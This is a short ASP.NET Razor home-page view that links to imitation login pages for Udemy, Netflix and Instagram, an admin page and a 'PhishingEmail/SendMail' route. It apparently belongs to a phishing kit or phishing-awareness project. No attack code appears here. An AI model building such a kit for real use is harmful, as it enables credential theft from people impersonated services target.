@{
    ViewData["Title"] = "Home Page";
}

<a href="Udemy/Ulogin/" style="font-size:50px">Udemy Login</a>
<br/>
<a href="Netflix/Nlogin/" style="font-size:50px">Netflix Login</a>
<br/>
<a href="Instagram/Ilogin/" style="font-size:50px">İnstagram Login</a>
<br/>
<a href="Admin/Admin/" style="font-size:50px">Admin</a>
<br/>
<a href="PhishingEmail/SendMail/" style="font-size:50px">Send Mail</a>
